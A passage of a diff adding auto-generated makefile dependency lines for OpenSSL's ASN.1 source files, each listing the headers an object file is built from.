+a_i2d_fp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_i2d_fp.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_i2d_fp.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_i2d_fp.o: ../../include/openssl/opensslconf.h
+a_i2d_fp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_i2d_fp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_i2d_fp.o: ../../include/openssl/symhacks.h ../cryptlib.h a_i2d_fp.c
+a_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_int.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_int.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_int.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_int.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_int.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_int.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_int.o: ../cryptlib.h a_int.c
+a_mbstr.o: ../../e_os.h ../../include/openssl/asn1.h
+a_mbstr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_mbstr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_mbstr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_mbstr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_mbstr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_mbstr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_mbstr.o: ../cryptlib.h a_mbstr.c
+a_object.o: ../../e_os.h ../../include/openssl/asn1.h
+a_object.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+a_object.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_object.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_object.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_object.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_object.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_object.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_object.o: ../../include/openssl/symhacks.h ../cryptlib.h a_object.c
+a_octet.o: ../../e_os.h ../../include/openssl/asn1.h
+a_octet.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_octet.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_octet.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_octet.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_octet.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_octet.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_octet.o: ../cryptlib.h a_octet.c
+a_print.o: ../../e_os.h ../../include/openssl/asn1.h
+a_print.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_print.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_print.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_print.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_print.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_print.o: ../cryptlib.h a_print.c
+a_set.o: ../../e_os.h ../../include/openssl/asn1.h
+a_set.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+a_set.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_set.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_set.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_set.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_set.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_set.o: ../../include/openssl/symhacks.h ../cryptlib.h a_set.c
+a_sign.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_sign.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_sign.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_sign.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_sign.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_sign.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_sign.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_sign.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_sign.c asn1_locl.h
+a_strex.o: ../../e_os.h ../../include/openssl/asn1.h
+a_strex.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_strex.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_strex.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_strex.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_strex.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_strex.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_strex.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_strex.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_strex.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_strex.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_strex.c charmap.h
+a_strnid.o: ../../e_os.h ../../include/openssl/asn1.h
+a_strnid.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_strnid.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_strnid.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_strnid.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+a_strnid.o: ../../include/openssl/opensslconf.h
+a_strnid.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_strnid.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_strnid.o: ../../include/openssl/symhacks.h ../cryptlib.h a_strnid.c
+a_time.o: ../../e_os.h ../../include/openssl/asn1.h
+a_time.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_time.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_time.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_time.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_time.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_time.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_time.o: ../../include/openssl/symhacks.h ../cryptlib.h ../o_time.h a_time.c
+a_time.o: asn1_locl.h
+a_type.o: ../../e_os.h ../../include/openssl/asn1.h
+a_type.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_type.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_type.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_type.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_type.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_type.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_type.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_type.o: ../../include/openssl/symhacks.h ../cryptlib.h a_type.c
+a_utctm.o: ../../e_os.h ../../include/openssl/asn1.h
+a_utctm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_utctm.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_utctm.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_utctm.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_utctm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_utctm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_utctm.o: ../cryptlib.h ../o_time.h a_utctm.c asn1_locl.h
+a_utf8.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_utf8.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_utf8.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_utf8.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_utf8.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_utf8.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_utf8.o: ../../include/openssl/symhacks.h ../cryptlib.h a_utf8.c
+a_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+a_verify.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+a_verify.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_verify.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_verify.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+a_verify.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+a_verify.o: ../../include/openssl/opensslconf.h
+a_verify.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_verify.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_verify.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_verify.c
+a_verify.o: asn1_locl.h
+ameth_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+ameth_lib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ameth_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ameth_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ameth_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ameth_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ameth_lib.o: ../../include/openssl/opensslconf.h
+ameth_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ameth_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ameth_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ameth_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ameth_lib.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ameth_lib.c
+ameth_lib.o: asn1_locl.h
+asn1_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+asn1_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+asn1_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+asn1_err.o: ../../include/openssl/opensslconf.h
+asn1_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn1_err.o: ../../include/openssl/symhacks.h asn1_err.c
+asn1_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+asn1_gen.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn1_gen.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+asn1_gen.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+asn1_gen.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+asn1_gen.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+asn1_gen.o: ../../include/openssl/opensslconf.h
+asn1_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_gen.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+asn1_gen.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+asn1_gen.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+asn1_gen.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+asn1_gen.o: ../cryptlib.h asn1_gen.c
+asn1_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+asn1_lib.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+asn1_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+asn1_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+asn1_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+asn1_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn1_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h asn1_lib.c
+asn1_par.o: ../../e_os.h ../../include/openssl/asn1.h
+asn1_par.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn1_par.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+asn1_par.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+asn1_par.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+asn1_par.o: ../../include/openssl/opensslconf.h
+asn1_par.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_par.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn1_par.o: ../../include/openssl/symhacks.h ../cryptlib.h asn1_par.c
+asn_mime.o: ../../e_os.h ../../include/openssl/asn1.h
+asn_mime.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+asn_mime.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+asn_mime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+asn_mime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+asn_mime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+asn_mime.o: ../../include/openssl/opensslconf.h
+asn_mime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn_mime.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+asn_mime.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+asn_mime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+asn_mime.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+asn_mime.o: ../cryptlib.h asn1_locl.h asn_mime.c
+asn_moid.o: ../../e_os.h ../../include/openssl/asn1.h
+asn_moid.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn_moid.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+asn_moid.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+asn_moid.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+asn_moid.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+asn_moid.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+asn_moid.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn_moid.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+asn_moid.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+asn_moid.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+asn_moid.o: ../../include/openssl/x509_vfy.h ../cryptlib.h asn_moid.c
+asn_pack.o: ../../e_os.h ../../include/openssl/asn1.h
+asn_pack.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn_pack.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+asn_pack.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+asn_pack.o: ../../include/openssl/opensslconf.h
+asn_pack.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn_pack.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn_pack.o: ../../include/openssl/symhacks.h ../cryptlib.h asn_pack.c
+bio_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_asn1.o: ../../include/openssl/opensslconf.h
+bio_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_asn1.o: ../../include/openssl/symhacks.h bio_asn1.c
+bio_ndef.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+bio_ndef.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+bio_ndef.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_ndef.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_ndef.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_ndef.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_ndef.o: ../../include/openssl/symhacks.h bio_ndef.c
+d2i_pr.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+d2i_pr.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+d2i_pr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+d2i_pr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+d2i_pr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+d2i_pr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+d2i_pr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+d2i_pr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+d2i_pr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+d2i_pr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+d2i_pr.o: ../../include/openssl/x509_vfy.h ../cryptlib.h asn1_locl.h d2i_pr.c
+d2i_pu.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+d2i_pu.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+d2i_pu.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+d2i_pu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+d2i_pu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+d2i_pu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+d2i_pu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+d2i_pu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+d2i_pu.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+d2i_pu.o: ../../include/openssl/symhacks.h ../cryptlib.h d2i_pu.c
+evp_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_asn1.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+evp_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+evp_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+evp_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+evp_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_asn1.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_asn1.c
+f_enum.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+f_enum.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+f_enum.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+f_enum.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+f_enum.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+f_enum.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+f_enum.o: ../../include/openssl/symhacks.h ../cryptlib.h f_enum.c
+f_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+f_int.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+f_int.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+f_int.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+f_int.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+f_int.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+f_int.o: ../../include/openssl/symhacks.h ../cryptlib.h f_int.c
+f_string.o: ../../e_os.h ../../include/openssl/asn1.h
+f_string.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+f_string.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+f_string.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+f_string.o: ../../include/openssl/opensslconf.h
+f_string.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+f_string.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+f_string.o: ../../include/openssl/symhacks.h ../cryptlib.h f_string.c
+i2d_pr.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+i2d_pr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+i2d_pr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+i2d_pr.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+i2d_pr.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+i2d_pr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+i2d_pr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+i2d_pr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+i2d_pr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+i2d_pr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+i2d_pr.o: ../cryptlib.h asn1_locl.h i2d_pr.c
+i2d_pu.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+i2d_pu.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+i2d_pu.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+i2d_pu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+i2d_pu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+i2d_pu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+i2d_pu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+i2d_pu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+i2d_pu.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+i2d_pu.o: ../../include/openssl/symhacks.h ../cryptlib.h i2d_pu.c
+n_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+n_pkey.o: ../../include/openssl/asn1_mac.h ../../include/openssl/asn1t.h
+n_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+n_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+n_pkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+n_pkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+n_pkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+n_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+n_pkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+n_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+n_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+n_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+n_pkey.o: ../cryptlib.h n_pkey.c
+nsseq.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+nsseq.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+nsseq.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+nsseq.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+nsseq.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+nsseq.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+nsseq.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+nsseq.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+nsseq.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+nsseq.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h nsseq.c
+p5_pbe.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_pbe.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p5_pbe.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p5_pbe.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p5_pbe.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p5_pbe.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p5_pbe.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p5_pbe.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p5_pbe.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+p5_pbe.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p5_pbe.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p5_pbe.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p5_pbe.c
+p5_pbev2.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_pbev2.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p5_pbev2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p5_pbev2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p5_pbev2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p5_pbev2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p5_pbev2.o: ../../include/openssl/opensslconf.h
+p5_pbev2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p5_pbev2.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+p5_pbev2.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p5_pbev2.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p5_pbev2.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p5_pbev2.o: ../cryptlib.h p5_pbev2.c
+p8_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+p8_pkey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p8_pkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p8_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p8_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p8_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p8_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p8_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p8_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p8_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p8_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p8_pkey.o: ../cryptlib.h p8_pkey.c
+t_bitst.o: ../../e_os.h ../../include/openssl/asn1.h
+t_bitst.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+t_bitst.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_bitst.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+t_bitst.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+t_bitst.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_bitst.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_bitst.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+t_bitst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_bitst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_bitst.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_bitst.o: ../../include/openssl/x509v3.h ../cryptlib.h t_bitst.c
+t_crl.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_crl.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_crl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_crl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+t_crl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+t_crl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_crl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_crl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+t_crl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_crl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_crl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_crl.o: ../../include/openssl/x509v3.h ../cryptlib.h t_crl.c
+t_pkey.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_pkey.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+t_pkey.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+t_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+t_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_pkey.o: ../cryptlib.h t_pkey.c
+t_req.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_req.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_req.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_req.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
